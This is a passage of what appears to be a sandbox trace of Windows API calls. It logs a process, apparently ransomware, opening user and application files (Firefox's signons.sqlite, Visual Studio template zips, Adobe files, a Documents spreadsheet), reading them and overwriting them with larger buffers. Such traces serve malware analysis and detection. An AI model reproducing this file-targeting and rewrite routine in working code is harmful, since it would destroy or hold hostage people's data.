lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.156] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.156] ReleaseMutex (hMutex=0x168) returned 1 [0183.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0183.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0183.156] ReadFile (in: hFile=0x1f0, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x331f2bc*=0x17c, lpOverlapped=0x0) returned 1 [0183.157] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0183.157] WriteFile (in: hFile=0x1f0, lpBuffer=0x28fca08*, nNumberOfBytesToWrite=0x704, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28fca08*, lpNumberOfBytesWritten=0x331f2d0*=0x704, lpOverlapped=0x0) returned 1 [0183.157] CloseHandle (hObject=0x1f0) returned 1 [0183.158] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0183.158] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.158] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xab [0183.158] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0183.159] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.159] ReleaseMutex (hMutex=0x168) returned 1 [0183.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0183.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0183.159] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f39f18, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39f18*, lpNumberOfBytesRead=0x331f2bc*=0xab, lpOverlapped=0x0) returned 1 [0183.160] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0183.160] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x633, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x331f2d0*=0x633, lpOverlapped=0x0) returned 1 [0183.160] CloseHandle (hObject=0x1f0) returned 1 [0183.160] GetCurrentThreadId () returned 0x94c [0183.160] GetCurrentThreadId () returned 0x94c [0183.160] GetCurrentThreadId () returned 0x94c [0183.160] SetEvent (hEvent=0xc4) returned 1 [0183.160] RtlExitUserThread (Status=0x0) Thread: id = 20 os_tid = 0x95c [0062.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.315] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.315] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x40000 [0062.315] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.316] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.316] ReleaseMutex (hMutex=0x168) returned 1 [0062.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index.sqlite", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index.sqlite", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="index.sqlite", lpUsedDefaultChar=0x0) returned 12 [0062.316] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0062.319] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3f000 [0062.319] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.324] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3f000 [0062.324] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.326] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0062.326] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0062.326] CloseHandle (hObject=0x1dc) returned 1 [0062.336] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.338] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.338] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x50000 [0062.338] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.338] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.338] ReleaseMutex (hMutex=0x168) returned 1 [0062.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="signons.sqlite", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0062.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="signons.sqlite", cchWideChar=14, lpMultiByteStr=0x1f7340c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="signons.sqlite", lpUsedDefaultChar=0x0) returned 14 [0062.339] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0062.345] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4f000 [0062.345] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.348] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4f000 [0062.348] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e92648*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.349] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0062.349] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0062.349] CloseHandle (hObject=0x1dc) returned 1 [0062.356] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.357] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.357] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4e2 [0062.357] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.357] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.357] ReleaseMutex (hMutex=0x168) returned 1 [0062.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AssemblyInfoInternal.zip", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0062.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AssemblyInfoInternal.zip", cchWideChar=24, lpMultiByteStr=0x1f8fd8c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AssemblyInfoInternal.zip", lpUsedDefaultChar=0x0) returned 24 [0062.358] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a28, nNumberOfBytesToRead=0x4e2, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesRead=0x345f2bc*=0x4e2, lpOverlapped=0x0) returned 1 [0062.523] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0062.523] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xa6a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xa6a, lpOverlapped=0x0) returned 1 [0062.524] CloseHandle (hObject=0x1dc) returned 1 [0062.525] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.525] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.525] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x83f [0062.525] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.526] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.526] ReleaseMutex (hMutex=0x168) returned 1 [0062.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Resource.zip", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Resource.zip", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Resource.zip", lpUsedDefaultChar=0x0) returned 12 [0062.526] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a28, nNumberOfBytesToRead=0x83f, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesRead=0x345f2bc*=0x83f, lpOverlapped=0x0) returned 1 [0062.528] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0062.528] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xdc7, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xdc7, lpOverlapped=0x0) returned 1 [0062.528] CloseHandle (hObject=0x1dc) returned 1 [0062.544] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.544] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.544] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x45d [0062.544] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.544] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.545] ReleaseMutex (hMutex=0x168) returned 1 [0062.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppConfigurationInternal.zip", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0062.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppConfigurationInternal.zip", cchWideChar=28, lpMultiByteStr=0x1f8fbac, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppConfigurationInternal.zip", lpUsedDefaultChar=0x0) returned 28 [0062.545] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e980c8, nNumberOfBytesToRead=0x45d, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e980c8*, lpNumberOfBytesRead=0x345f2bc*=0x45d, lpOverlapped=0x0) returned 1 [0062.547] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0062.547] WriteFile (in: hFile=0x1dc, lpBuffer=0x2691bd8*, nNumberOfBytesToWrite=0x9e5, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bd8*, lpNumberOfBytesWritten=0x345f2d0*=0x9e5, lpOverlapped=0x0) returned 1 [0062.547] CloseHandle (hObject=0x1dc) returned 1 [0062.553] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.553] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.553] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb090 [0062.555] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.555] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.555] ReleaseMutex (hMutex=0x168) returned 1 [0062.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginForm.zip", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LoginForm.zip", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoginForm.zip", lpUsedDefaultChar=0x0) returned 13 [0062.556] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.698] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa090 [0062.698] ReadFile (in: hFile=0x1dc, lpBuffer=0x2667a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.714] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa090 [0062.714] WriteFile (in: hFile=0x1dc, lpBuffer=0x269dc48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x269dc48*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.714] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0062.715] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.715] CloseHandle (hObject=0x1dc) returned 1 [0062.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.748] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.748] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa5ff [0062.748] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.748] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.748] ReleaseMutex (hMutex=0x168) returned 1 [0062.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rdrmessage.zip", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0062.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rdrmessage.zip", cchWideChar=14, lpMultiByteStr=0x1f7320c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rdrmessage.zip", lpUsedDefaultChar=0x0) returned 14 [0062.748] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.785] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x95ff [0062.785] ReadFile (in: hFile=0x1dc, lpBuffer=0x269ec78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x269ec78*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.799] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x95ff [0062.800] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ec3568*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec3568*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.800] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0062.800] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.800] CloseHandle (hObject=0x1dc) returned 1 [0062.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n8jJ7uBD.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n8jj7ubd.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.875] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.875] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, 